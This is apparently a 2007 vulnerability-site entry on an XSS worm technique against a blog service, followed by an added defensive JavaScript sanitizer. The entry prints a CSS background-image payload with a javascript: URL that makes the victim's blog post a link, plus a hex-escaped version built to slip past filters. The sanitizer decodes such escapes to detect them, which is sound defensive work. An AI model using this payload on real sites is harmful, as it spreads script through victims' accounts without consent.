XSS 0DAY-vulnerability warning-the black bar safety net

2007-01-06T00:00:00
ID MYHACK58:62200713617
Type myhack58
Reporter Anonymous
Modified 2007-01-06T00:00:00

Description

See dream light out! I also do not hide!

On 10/7, when I sent the logs, prompting everyone! Here was the last issued by XSS WORM beginning to try to continue it.

Actually it is very simple: the code is transcoded twice.

<DIV STYLE="background-image: url(javascript:var XmlHttp=new ActiveXObject("Microsoft.XMLhttp"); XmlHttp.Open("get","/manage/use.do?m=add&title=S0n9%20bl09&desc=This%20is%20XSS%20TEST%20%21&link=http%3A//s0n9.blog.sohu.com&_",true); XmlHttp.send(null);)">

ASCII transcoding reference <http://s0n9.blog.sohu.com/16002288.html>

Written as the following hexadecimal (base-16) escape string:

<div style="background-image:\0075\0072\006C\0028\006A\0061\0076\0061\0073\0063\0072\0069\0070\0074\003A\0065\0076\0061\006C\0028\0053\0074\0072\0069\006E\0067\002E\0066\0072\006F\006D\0043\0068\0061\0072\0043\006F\006......"></div>

This method can also be used for other style sheet properties.
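
As an added example (not code from the original post), the JavaScript below shows the defensive counterpart: decode CSS backslash escapes in a style value before checking it, because the escaped string above spells `url(javascript:` to the CSS parser but not to a filter that reads the raw text. The function names and the sample value are assumptions made for this example, and the check runs over the whole style value, so it does not depend on which property carries the URL.

```javascript
// Added example: normalise a style value the way a CSS parser reads it,
// then look for script-bearing constructs. All names are hypothetical.

// "\" + 1-6 hex digits (+ one optional whitespace terminator) is a code
// point; "\" + any other non-newline character is that character.
function decodeCssEscapes(css) {
  return css.replace(
    /\\([0-9a-fA-F]{1,6})(?:\r\n|[ \t\r\n\f])?|\\([^\r\n\f])/g,
    (match, hex, literal) => {
      if (hex === undefined) return literal;
      const cp = parseInt(hex, 16);
      const invalid =
        cp === 0 || cp > 0x10ffff || (cp >= 0xd800 && cp <= 0xdfff);
      return invalid ? "\uFFFD" : String.fromCodePoint(cp);
    }
  );
}

// Strip comments, decode escapes, drop whitespace/control characters and
// fold case, so every spelling of the same value compares equal.
function normalizeStyle(style) {
  return decodeCssEscapes(style.replace(/\/\*[\s\S]*?\*\//g, ""))
    .replace(/[\u0000-\u0020]/g, "")
    .toLowerCase();
}

const SCRIPT_PATTERNS = [/javascript:/, /vbscript:/, /expression\(/];

// True when the normalised value contains a script-bearing construct.
function styleIsScriptable(style) {
  const normalized = normalizeStyle(style);
  return SCRIPT_PATTERNS.some((re) => re.test(normalized));
}

// The kind of raw-text check that the escaped form slips past.
function naiveFilterFlags(style) {
  return /javascript:/i.test(style);
}

// Constructed sample: the first 15 escapes shown on this page
// ("url(javascript:") followed by a harmless void(0) tail.
const SAMPLE = String.raw`background-image:\0075\0072\006C\0028\006A\0061\0076\0061\0073\0063\0072\0069\0070\0074\003Avoid(0))`;

console.log("raw-text filter flags it:", naiveFilterFlags(SAMPLE));
console.log("after decoding, flagged:", styleIsScriptable(SAMPLE));
console.log("normalised value:", normalizeStyle(SAMPLE));
```

A sanitizer built on this would reject or rewrite any style value for which `styleIsScriptable` returns true, rather than trying to strip the matched substring.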